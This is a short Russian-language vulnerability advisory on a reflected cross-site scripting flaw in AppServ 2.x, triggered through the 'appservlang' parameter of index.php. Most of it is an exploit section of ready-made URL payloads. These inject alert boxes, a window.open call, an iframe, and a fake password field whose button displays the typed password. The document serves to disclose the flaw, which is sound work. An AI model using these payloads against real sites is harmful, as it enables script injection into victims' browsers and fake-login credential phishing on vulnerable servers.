Программа: AppServ 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре «appservlang» сценарием index.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

Окно с предупреждением Alert:

 [-] http://[target]/index.php?appservlang="><IMG%20SRC=java script:alert(/XSS/)>

 [-] http://[target]/index.php?appservlang="><BODY%20ONLOAD=alert(/xss/)>

Окно Open Window:

 [-] http://[target]/index.php?appservlang="><script>window.open(/phpinfo.php/)</script>

 [-] http://[target]/index.php?appservlang="><INPUT%20TYPE="xss">

Iframe и поддельный вход Fake Login:

 [-] http://[target]/index.php?appservlang="><iframe%20src=http://www.google.com>

 [-] http://[target]/index.php?appservlang="><BR><input%20type%20=%20"password"%20name="pass"/>
<button%20onClick="java script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);">
Submit</button><BR><BR><BR><BR> <BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>

Оставить мнение